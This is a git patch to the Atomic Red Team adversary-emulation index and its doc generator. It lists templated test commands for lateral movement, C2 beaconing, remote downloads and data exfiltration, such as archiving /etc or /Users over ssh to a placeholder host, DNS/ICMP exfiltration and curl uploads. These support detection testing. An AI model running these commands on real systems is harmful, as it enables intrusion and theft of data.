prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -66769,7 +66769,7 @@ lateral-movement: net start sesshijack cleanup_command: 'sc.exe delete sesshijack >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1021.001: @@ -66841,7 +66841,7 @@ lateral-movement: auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e description: 'Attempt an RDP session via Remote Desktop Application to a DomainController. -' + ' supported_platforms: - windows input_arguments: @@ -66864,15 +66864,15 @@ lateral-movement: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | $Server=#{logonserver} @@ -66889,7 +66889,7 @@ lateral-movement: auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b description: 'Attempt an RDP session via Remote Desktop Application over Powershell -' + ' supported_platforms: - windows input_arguments: @@ -66922,7 +66922,7 @@ lateral-movement: description: 'Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell -' + ' supported_platforms: - windows input_arguments: @@ -66946,7 +66946,7 @@ lateral-movement: auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 description: 'Changing RDP Port to Non Standard Port via Command_Prompt -' + ' supported_platforms: - windows input_arguments: @@ -67227,7 +67227,7 @@ lateral-movement: auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 description: 'Connecting To Remote Shares -' + ' supported_platforms: - windows input_arguments: @@ -67251,13 +67251,13 @@ lateral-movement: command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" -' + ' name: command_prompt - name: Map Admin Share PowerShell auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 description: 'Map Admin share utilizing PowerShell -' + ' supported_platforms: - windows input_arguments: @@ -67276,14 +67276,14 @@ lateral-movement: executor: command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} -' + ' name: powershell - name: Copy and Execute File with PsExec auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf description: 'Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). -' + ' supported_platforms: - windows input_arguments: @@ -67304,10 +67304,10 @@ lateral-movement: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) -' + ' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -67337,7 +67337,7 @@ lateral-movement: command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 -' + ' name: command_prompt elevation_required: true T1021.004: @@ -67568,7 +67568,7 @@ lateral-movement: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. -' + ' supported_platforms: - windows input_arguments: @@ -67584,10 +67584,10 @@ lateral-movement: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) -' + ' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -67880,7 +67880,7 @@ lateral-movement: executor: command: 'Enable-PSRemoting -Force -' + ' name: powershell elevation_required: true - name: Invoke-Command @@ -67903,7 +67903,7 @@ lateral-movement: executor: command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} -' + ' name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d @@ -68264,7 +68264,7 @@ command-and-control: "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} -' + ' name: powershell - name: DNS Regular Beaconing auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 @@ -69062,7 +69062,7 @@ command-and-control: auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: 'Utilize rsync to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -69086,13 +69086,13 @@ command-and-control: executor: command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} -' + ' name: bash - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: 'Utilize rsync to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69116,13 +69116,13 @@ command-and-control: executor: command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} -' + ' name: bash - name: scp remote file copy (push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: 'Utilize scp to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -69146,13 +69146,13 @@ command-and-control: executor: command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path} -' + ' name: bash - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: 'Utilize scp to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69176,13 +69176,13 @@ command-and-control: executor: command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path} -' + ' name: bash - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: 'Utilize sftp to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -69206,13 +69206,13 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}'' -' + ' name: bash - name: sftp remote file copy (pull) auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef' description: 'Utilize sftp to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69236,14 +69236,14 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path} -' + ' name: bash - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: 'Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! -' + ' supported_platforms: - windows input_arguments: @@ -69258,17 +69258,17 @@ command-and-control: executor: command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} -' + ' cleanup_command: 'del #{local_path} >nul 2>&1 -' + ' name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: 'Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! -' + ' supported_platforms: - windows input_arguments: @@ -69290,7 +69290,7 @@ command-and-control: cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b @@ -69316,7 +69316,7 @@ command-and-control: command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} -' + ' name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 @@ -69338,17 +69338,17 @@ command-and-control: command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") -' + ' cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: 'OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. -' + ' supported_platforms: - windows input_arguments: @@ -69425,7 +69425,7 @@ command-and-control: auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: 'Download a remote file using the whois utility -' + ' supported_platforms: - linux - macos @@ -69453,29 +69453,29 @@ command-and-control: dependencies: - description: 'The whois and timeout commands must be present -' + ' prereq_command: 'which whois && which timeout -' + ' get_prereq_command: 'echo "Please install timeout and the whois package" -' + ' executor: name: sh elevation_required: false command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: 'Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -69509,7 +69509,7 @@ command-and-control: name: command_prompt command: 'finger base64_filedata@#{remote_host} -' + ' - name: Download a file with IMEWDBLD.exe auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2 description: | @@ -69557,10 +69557,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69603,10 +69603,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69615,13 +69615,13 @@ command-and-control: Remove-Item $env:temp\curl.zip - description: 'A file must be created to upload -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "This is an Atomic Test File" > #{file_path} -' + ' executor: command: | #{curl_path} -T #{file_path} #{remote_destination} @@ -69719,7 +69719,7 @@ command-and-control: executor: command: 'export #{proxy_scheme}_proxy=#{proxy_server} -' + ' cleanup_command: | unset http_proxy unset https_proxy @@ -70108,10 +70108,10 @@ command-and-control: dependencies: - description: 'ncat.exe must be available at specified location (#{ncat_exe}) -' + ' prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null @@ -70125,7 +70125,7 @@ command-and-control: executor: command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port} -' + ' name: powershell - name: Powercat C2 auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e @@ -70274,13 +70274,13 @@ command-and-control: executor: command: 'Test-NetConnection -ComputerName #{domain} -port #{port} -' + ' name: powershell - name: Testing usage of uncommonly used port auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 description: 'Testing uncommonly used port utilizing telnet. -' + ' supported_platforms: - linux - macos @@ -70296,7 +70296,7 @@ command-and-control: executor: command: 'telnet #{domain} #{port} -' + ' name: sh T1102.003: technique: @@ -70538,7 +70538,7 @@ command-and-control: -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content } -' + ' name: powershell - name: DNS over HTTPS Regular Beaconing auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b @@ -70728,7 +70728,7 @@ command-and-control: and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70749,7 +70749,7 @@ command-and-control: and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70768,7 +70768,7 @@ command-and-control: and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70788,7 +70788,7 @@ command-and-control: and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70874,7 +70874,7 @@ command-and-control: auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 description: 'Utilizing a common technique for posting base64 encoded data. -' + ' supported_platforms: - macos - linux @@ -71180,7 +71180,7 @@ command-and-control: - description: "Curl must be installed on system \n" prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71385,7 +71385,7 @@ exfiltration: auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a description: 'Take a file/directory, split it into 5Mb chunks -' + ' supported_platforms: - macos - linux @@ -71404,12 +71404,12 @@ exfiltration: prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 -' + ' executor: command: | cd #{folder_path}; split -b 5000000 #{file_name} @@ -71417,7 +71417,7 @@ exfiltration: cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; -' + ' name: sh T1048: technique: @@ -71496,7 +71496,7 @@ exfiltration: executor: command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz -' + ' name: sh - name: Exfiltration Over Alternative Protocol - SSH auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 @@ -71526,7 +71526,7 @@ exfiltration: command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} ''cat > /Users.tar.gz.enc'' -' + ' name: sh - name: DNSExfiltration (doh) auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48 @@ -71562,20 +71562,20 @@ exfiltration: description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers. type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module}) -' + ' prereq_command: 'if (Test-Path #{ps_module}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile #{ps_module} -' + ' executor: command: | Import-Module #{ps_module} @@ -71639,7 +71639,7 @@ exfiltration: auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 description: 'Exfiltrate data HTTPS using curl to file share site file.io -' + ' supported_platforms: - windows input_arguments: @@ -71655,10 +71655,10 @@ exfiltration: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71674,7 +71674,7 @@ exfiltration: auto_generated_guid: 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 description: 'Exfiltrate data HTTPS using curl to file share site file.io -' + ' supported_platforms: - macos - linux @@ -71775,7 +71775,7 @@ exfiltration: auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932 description: 'Exfiltrates a file present on the victim machine to the C2 server. -' + ' supported_platforms: - windows input_arguments: @@ -72028,13 +72028,13 @@ exfiltration: in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } -' + ' name: powershell - name: Exfiltration Over Alternative Protocol - DNS auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 description: 'Exfiltration of specified file over DNS protocol. -' + ' supported_platforms: - linux executor: @@ -72079,7 +72079,7 @@ exfiltration: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} -' + ' name: powershell input_arguments: input_file: @@ -72482,7 +72482,7 @@ initial-access: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -72517,20 +72517,20 @@ initial-access: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1195.003: technique: external_references: @@ -72768,7 +72768,7 @@ initial-access: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -72779,10 +72779,10 @@ initial-access: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1078.002: @@ -73096,7 +73096,7 @@ initial-access: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list -' + ' supported_platforms: - windows input_arguments: @@ -73109,12 +73109,12 @@ initial-access: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" -' + ' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -73483,7 +73483,7 @@ initial-access: cleanup_command: 'Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore -' + ' - name: Word spawned a command shell and used an IP address in the command line auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f description: | @@ -73495,7 +73495,7 @@ initial-access: jse_path: description: 'Path for the macro to write out the "malicious" .jse file -' + ' type: String default: C:\Users\Public\art.jse ms_product: @@ -73506,7 +73506,7 @@ initial-access: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -73517,7 +73517,7 @@ initial-access: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -73526,7 +73526,7 @@ initial-access: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore -' + ' name: powershell T1566.002: technique: diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb index d023d67c..bee78163 100755 --- a/bin/generate-atomic-docs.rb +++ b/bin/generate-atomic-docs.rb @@ -233,7 +233,6 @@ class AtomicRedTeamDocs "techniqueID" => atomic_yaml['attack_technique'], "score" => 100, "enabled" => true, -# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" "links" => ["label" => "View Atomic", "url" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"] } @@ -241,11 +240,30 @@ class AtomicRedTeamDocs "techniqueID" => atomic_yaml['attack_technique'].split('.')[0], "score" => 100, "enabled" => true, -# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" "links" => ["label" => "View Atomic", "url" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"] } techniques.push(technique) + + for technique in techniques + if not technique['techniqueID'].include?(".") then + techniqueParent = { + "techniqueID" => atomic_yaml['attack_technique'].split('.')[0], + "score" => 100, + "enabled" => true, +# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" + "links" => ["label" => "View Atomics", "url" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'].split('.')[0] + "/" + atomic_yaml['attack_technique'].split('.')[0] + ".md"] + } + else + techniqueParent = { + "techniqueID" => atomic_yaml['attack_technique'].split('.')[0], + "score" => 100, + "enabled" => true +# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" + } + end + end + techniques.push(techniqueParent) unless techniques.include?(techniqueParent) has_windows_tests = false has_macos_tests = false From 5e043ef568da36b6400d436e6a33e70d90ed9d7f Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 31 Jan 2022 22:59:43 +0000 Subject: [PATCH 11/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-azure-ad.json | 2 +- .../art-navigator-layer-containers.json | 1 + .../art-navigator-layer-google-workspace.json | 2 +- .../art-navigator-layer-iaas.json | 2 +- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer-office-365.json | 1 + .../art-navigator-layer-windows.json | 1 + .../art-navigator-layer.json | 1 + atomics/Indexes/index.yaml | 4140 ++++++++--------- 10 files changed, 2079 insertions(+), 2075 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json index 8b137891..98a90907 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json @@ -1 +1 @@ - +{"version":"4.3","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json index e69de29b..14962a2a 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json @@ -0,0 +1 @@ +{"version":"4.3","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json index 8b137891..7e84f69b 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json @@ -1 +1 @@ - +{"version":"4.3","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json index 8b137891..f6dd5a2c 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json @@ -1 +1 @@ - +{"version":"4.3","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 8b137891..97719cf8 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ - +{"version":"4.3","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View 